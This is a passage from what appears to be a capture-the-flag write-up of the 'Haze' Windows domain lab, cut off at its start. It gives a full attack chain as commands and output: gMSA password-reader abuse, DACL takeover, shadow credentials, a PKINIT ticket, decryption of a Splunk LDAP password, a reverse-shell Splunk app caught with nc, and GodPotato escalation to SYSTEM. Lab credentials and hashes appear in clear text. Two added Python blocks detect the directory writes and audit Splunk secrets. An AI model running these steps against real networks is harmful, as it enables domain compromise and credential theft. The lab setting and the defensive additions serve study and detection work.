LDAPS       10.10.11.61     636    DC01             [*] Getting GMSA Passwords
LDAPS       10.10.11.61     636    DC01             Account: Haze-IT-Backup$      NTLM: <no read permissions>                PrincipalsAllowedToReadPassword: Domain Admins

We can check who is allowed to retrieve the password.

*Evil-WinRM* PS C:\Users\mark.adams\Documents> Get-ADServiceAccount -Identity "Haze-IT-Backup$" -Properties PrincipalsAllowedToRetrieveManagedPassword

DistinguishedName                          : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled                                    : True
Name                                       : Haze-IT-Backup
ObjectClass                                : msDS-GroupManagedServiceAccount
ObjectGUID                                 : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Domain Admins,CN=Users,DC=haze,DC=htb}
SamAccountName                             : Haze-IT-Backup$
SID                                        : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName                          :

Only Domain Admins can retrieve the password and Mark is not one, but Mark is in the gMSA_Managers group, so let’s try to change which principal is allowed to retrieve it.

*Evil-WinRM* PS C:\Users\mark.adams\Documents> Set-ADServiceAccount -Identity "Haze-IT-Backup$" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
*Evil-WinRM* PS C:\Users\mark.adams\Documents> Get-ADServiceAccount -Identity "Haze-IT-Backup$" -Properties PrincipalsAllowedToRetrieveManagedPassword

DistinguishedName                          : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled                                    : True
Name                                       : Haze-IT-Backup
ObjectClass                                : msDS-GroupManagedServiceAccount
ObjectGUID                                 : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Mark Adams,CN=Users,DC=haze,DC=htb}
SamAccountName                             : Haze-IT-Backup$
SID                                        : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName                          :

*Evil-WinRM* PS C:\Users\mark.adams\Documents> 

Now we can retrieve the password hash of Haze-IT-Backup$.

└─$ netexec ldap 10.10.11.61 -u mark.adams  -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAP        10.10.11.61     389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
LDAPS       10.10.11.61     636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
LDAPS       10.10.11.61     636    DC01             [*] Getting GMSA Passwords
LDAPS       10.10.11.61     636    DC01             Account: Haze-IT-Backup$      NTLM: 4de830d1d58c14e241aff55f82ecdba1     PrincipalsAllowedToReadPassword: mark.adams

So the best practice is to refresh the BloodHound data as soon as you obtain a new account in the domain.

BloodHound with the new hash

└─$ bloodhound-python -u 'Haze-IT-Backup$' --hashes :4de830d1d58c14e241aff55f82ecdba1 -d HAZE.htb -ns 10.10.11.61 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 9 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 01M 24S
INFO: Compressing output into 20250621225343_bloodhound.zip

BloodHound shows the path HAZE-IT-BACKUP@HAZE.HTB -> WriteOwner -> SUPPORT_SERVICES@HAZE.HTB -> ForceChangePassword / AddKeyCredentialLink -> EDWARD.MARTIN@HAZE.HTB

WriteOwner

Set HAZE-IT-BACKUP@HAZE.HTB as group owner of SUPPORT_SERVICES@HAZE.HTB

└─$ bloodyAD --host 10.10.11.61 -d HAZE.htb -u 'Haze-IT-Backup$' -p ':4de830d1d58c14e241aff55f82ecdba1' set owner SUPPORT_SERVICES Haze-IT-Backup$
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES

Now we need to add HAZE-IT-BACKUP@HAZE.HTB to SUPPORT_SERVICES@HAZE.HTB, but before that we need to grant ourselves the required permissions (as owner we can write the object's DACL):

└─$ impacket-dacledit -action write -rights FullControl -target 'SUPPORT_SERVICES' -principal 'Haze-IT-Backup$' haze.htb/'Haze-IT-Backup$' -hashes :4de830d1d58c14e241aff55f82ecdba1 -dc-ip 10.10.11.61
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250622-150331.bak
[*] DACL modified successfully!

Now that Haze-IT-Backup$ has full control over SUPPORT_SERVICES, we can add ourselves to the group:

└─$ bloodyAD --host 10.10.11.61 -d HAZE.htb -u 'Haze-IT-Backup$' -p ':4de830d1d58c14e241aff55f82ecdba1' add groupMember SUPPORT_SERVICES 'Haze-IT-Backup$'                                             
[+] Haze-IT-Backup$ added to SUPPORT_SERVICES

Shadow Credentials

We will use pywhisker (https://github.com/ShutdownRepo/pywhisker.git) to add shadow credentials to edward.martin, i.e. a key credential written to the account's msDS-KeyCredentialLink attribute:

└─$ python3 ./pywhisker.py -d "haze.htb" -u "Haze-IT-Backup$" -H "4de830d1d58c14e241aff55f82ecdba1" --target "edward.martin" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: dce8fcca-0909-fd32-ec64-a49f22908dae
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: wWY9OlFa.pfx
[+] PFX exportiert nach: wWY9OlFa.pfx
[i] Passwort für PFX: L3oq6tfwmifew1Nbn7Pm
[+] Saved PFX (#PKCS12) certificate & key at path: wWY9OlFa.pfx
[*] Must be used with password: L3oq6tfwmifew1Nbn7Pm
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
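The three directory writes in this chain (changing the gMSA's PrincipalsAllowedToRetrieveManagedPassword, rewriting the owner and DACL of SUPPORT_SERVICES, and adding a key credential to edward.martin) each land in Windows Security event 5136 as a write to a single attribute. As an added example (not part of this writeup or of any tool used here), this Python detection logic flags those writes when they come from an account outside a tier-0 allow-list; it assumes "Audit Directory Service Changes" is enabled and the objects carry a SACL, since otherwise 5136 is never generated. The sample events, the Support_Services DN and the allow-list are constructed.

```python
"""Detection logic for the directory writes made in this chain (added example, not part of the writeup).

Assumes 'Audit Directory Service Changes' is enabled and the objects carry a SACL;
otherwise Windows never emits event 5136. Sample events below are constructed.
"""
from dataclasses import dataclass

# Attribute written at each step of the path, and why a write by an unexpected principal matters.
SENSITIVE_ATTRS = {
    "msDS-GroupMSAMembership": "gMSA password-reader set changed (PrincipalsAllowedToRetrieveManagedPassword)",
    "nTSecurityDescriptor": "owner or DACL rewritten (WriteOwner / dacledit)",
    "msDS-KeyCredentialLink": "key credential added to account (shadow credentials)",
}

# Constructed allow-list: principals expected to write these attributes (tier-0 admins, the DC itself).
EXPECTED_WRITERS = {"Administrator", "DC01$"}

@dataclass(frozen=True)
class Alert:
    subject: str   # SubjectUserName of the 5136 event
    target: str    # ObjectDN that was modified
    reason: str

def detect_sensitive_writes(events, expected_writers=EXPECTED_WRITERS):
    """Return one Alert per 5136 event that writes a sensitive attribute from outside the allow-list."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        attr = ev.get("AttributeLDAPDisplayName", "")
        if attr in SENSITIVE_ATTRS and ev.get("SubjectUserName") not in expected_writers:
            alerts.append(Alert(ev["SubjectUserName"], ev["ObjectDN"], SENSITIVE_ATTRS[attr]))
    return alerts

# Constructed sample events mirroring this writeup's steps; field names follow event 5136's XML schema.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "mark.adams", "AttributeLDAPDisplayName": "msDS-GroupMSAMembership",
     "ObjectDN": "CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "Haze-IT-Backup$", "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "ObjectDN": "CN=Support_Services,CN=Users,DC=haze,DC=htb"},  # group DN constructed
    {"EventID": 5136, "SubjectUserName": "Haze-IT-Backup$", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "ObjectDN": "CN=Edward Martin,CN=Users,DC=haze,DC=htb"},
    # Benign noise: an allow-listed admin touching a DACL, and a user changing a harmless attribute.
    {"EventID": 5136, "SubjectUserName": "Administrator", "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "ObjectDN": "CN=Support_Services,CN=Users,DC=haze,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "mark.adams", "AttributeLDAPDisplayName": "description",
     "ObjectDN": "CN=Mark Adams,CN=Users,DC=haze,DC=htb"},
]
```

In a real deployment the allow-list should be derived from tier-0 group membership rather than hard-coded, and 5136 events should be collected from every domain controller.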

Now let’s use https://github.com/dirkjanm/PKINITtools

└─$ python3 gettgtpkinit.py -cert-pfx 'wWY9OlFa.pfx' -pfx-pass 'L3oq6tfwmifew1Nbn7Pm' "haze.htb"/'edward.martin' 'edward.ccache'
2025-06-22 23:33:01,872 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-06-22 23:33:02,284 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-06-22 23:33:03,242 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-06-22 23:33:03,242 minikerberos INFO     1f1c7507edbc0aafc6f26dcd6fcbec522458f5c5cf549fed52257d15982d98db
INFO:minikerberos:1f1c7507edbc0aafc6f26dcd6fcbec522458f5c5cf549fed52257d15982d98db
2025-06-22 23:33:03,246 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Using this TGT, we can grab our NT hash, or use it directly to authenticate over WinRM:

Setting Environment Variables

└─$ netexec smb 10.10.11.61 -u mark.adams  -p 'Ld@p_Auth_Sp1unk@2k24' --generate-krb5-file ./krb5.conf
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
┌──(anurag㉿anurag)-[~/htb/Haze/PKINITtools]
└─$ export KRB5_CONFIG=./krb5.conf      

└─$ export KRB5CCNAME=edward.ccache

Now we connect over WinRM using the ccache file:

└─$ evil-winrm -i dc01.haze.htb -k  -f edward.ccache -r haze.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: Useless cert/s provided, SSL is not enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\edward.martin\Documents> 

And we have user.txt.

Privilege Escalation

Shell as alexander.green

Extracting credentials from the Splunk auth config

As edward.martin we find a Splunk backup zip:

*Evil-WinRM* PS C:\Backups\Splunk> dir

    Directory: C:\Backups\Splunk

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/6/2024   3:22 PM       27445566 splunk_backup_2024-08-06.zip

Inside the backup, authentication.conf contains an encrypted bindDNpassword for the LDAP bind account alexander.green:

┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ cat Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
[default]

minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]

SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_Admins,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

We also found splunk.secret

└─$ find Splunk 2>/dev/null | grep splunk.secret
Splunk/etc/auth/splunk.secret
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ cat Splunk/etc/auth/splunk.secret
CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B

With splunk.secret we can decrypt the $1$ value (splunksecrets prompts for the ciphertext):

└─$ splunksecrets splunk-decrypt --splunk-secret Splunk/etc/auth/splunk.secret
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=
Sp1unkadmin@2k24
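The bindDNpassword above is only as protected as splunk.secret: Splunk's $1$ (and newer $7$) values are encrypted with a key derived from that file, so a backup that contains both is effectively plaintext. As an added example, not part of this writeup or of splunksecrets, this Python audit walks a Splunk config tree, reports every encrypted field and whether splunk.secret ships alongside it; the sample tree and its placeholder values are constructed in a temporary directory.

```python
"""Audit a Splunk config tree for reversible secrets (added example, not part of the writeup).

Splunk's $1$ (RC4) and $7$ (AES) password fields are encrypted with a key derived from
etc/auth/splunk.secret, so a backup that ships both is equivalent to plaintext.
Paths follow the layout seen in this writeup; the sample tree is constructed in a temp dir.
"""
import configparser
import re
import tempfile
from pathlib import Path

ENCRYPTED_RE = re.compile(r"^\$(1|7)\$")

def find_encrypted_fields(root: Path):
    """Yield (relative path, stanza, key, scheme) for every $1$/$7$ value under root."""
    for conf in sorted(root.rglob("*.conf")):
        parser = configparser.ConfigParser(interpolation=None, strict=False)
        parser.optionxform = str        # keep key case (bindDNpassword, not binddnpassword)
        try:
            parser.read(conf, encoding="utf-8")
        except configparser.Error:
            continue                     # not every Splunk .conf is INI-clean; skip rather than crash
        for stanza in parser.sections():
            for key, value in parser.items(stanza):
                m = ENCRYPTED_RE.match(value)
                if m:
                    yield (conf.relative_to(root).as_posix(), stanza, key, f"${m.group(1)}$")

def audit(root: Path):
    """Return a report: encrypted fields plus whether splunk.secret is present to reverse them."""
    fields = list(find_encrypted_fields(root))
    secret = root / "etc" / "auth" / "splunk.secret"
    return {"fields": fields, "secret_present": secret.is_file(),
            "reversible": bool(fields) and secret.is_file()}

def build_sample_tree():
    """Constructed backup layout mirroring the writeup (values are placeholders, not the real ones)."""
    root = Path(tempfile.mkdtemp())
    conf = root / "var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf"
    conf.parent.mkdir(parents=True)
    conf.write_text("[Haze LDAP Auth]\nbindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb\n"
                    "bindDNpassword = $1$PLACEHOLDERCIPHERTEXT=\n\n[authentication]\nauthType = LDAP\n")
    (root / "etc/auth").mkdir(parents=True)
    (root / "etc/auth/splunk.secret").write_text("PLACEHOLDER_SPLUNK_SECRET\n")
    return root
```

Run audit() against an extracted backup: a "reversible" result means the archive must be treated as containing cleartext credentials, and splunk.secret should never be bundled with config snapshots.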

Let's log in to the Splunk web portal as admin with this password.

Splunk rev shell

Under "Apps" → "Manage Apps" there is an option to install an app from a file.

We will use this to get a shell: edit run.ps1 in the reverse_shell_splunk app to set our IP and port.

Then pack the app directory into a tarball and rename it to .spl:

└─$ tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
reverse_shell_splunk/
reverse_shell_splunk/default/
reverse_shell_splunk/default/inputs.conf
reverse_shell_splunk/bin/
reverse_shell_splunk/bin/run.ps1
reverse_shell_splunk/bin/rev.py
reverse_shell_splunk/bin/run.bat
┌──(anurag㉿anurag)-[~/htb/Haze/reverse_shell_splunk]
└─$ ls
README.md  reverse_shell_splunk  reverse_shell_splunk.tgz
┌──(anurag㉿anurag)-[~/htb/Haze/reverse_shell_splunk]
└─$ mv reverse_shell_splunk.tgz reverse_shell_splunk.spl

Now install the app through the portal and wait for the callback:

└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.11.61] 56055
id
PS C:\Windows\system32> 

SeImpersonatePrivilege

We can see that alexander.green has SeImpersonatePrivilege:

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Windows\system32> 

I tried PrintSpoofer64.exe but it did not work.

Let's try GodPotato (https://github.com/BeichenDream/GodPotato):

PS C:\Users\Public> .\GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140732389326848
[*] DispatchTable: 0x140732391917896
[*] UseProtseqFunction: 0x140732391209792
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\15bbf199-14a0-49a5-a5a4-a457ca587973\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b402-1418-ffff-8303-caa7809cb3df
[*] DCOM obj OXID: 0xabb94c51616ed9bf
[*] DCOM obj OID: 0xeb89f4000f4cd7f1
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 932 Token:0x700  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3948

GodPotato runs in our NT AUTHORITY\NETWORK SERVICE context and impersonates the SYSTEM token it finds, so we can run commands as SYSTEM and read root.txt:

PS C:\Users\Public> ./GodPotato-NET4.exe -cmd 'cmd /c type "C:\Users\Administrator\Desktop\root.txt"'
[*] CombaseModule: 0x140732389326848
[*] DispatchTable: 0x140732391917896
[*] UseProtseqFunction: 0x140732391209792
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\95977aec-7d51-4af5-b869-850d9faf2d99\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00002402-0ad8-ffff-0b99-796f9b96b0eb
[*] DCOM obj OXID: 0x191bd70ca41753e5
[*] DCOM obj OID: 0xeaef92e998db3d97
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 932 Token:0x700  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3828
20897512e70c4967eef1c25f504d83f9
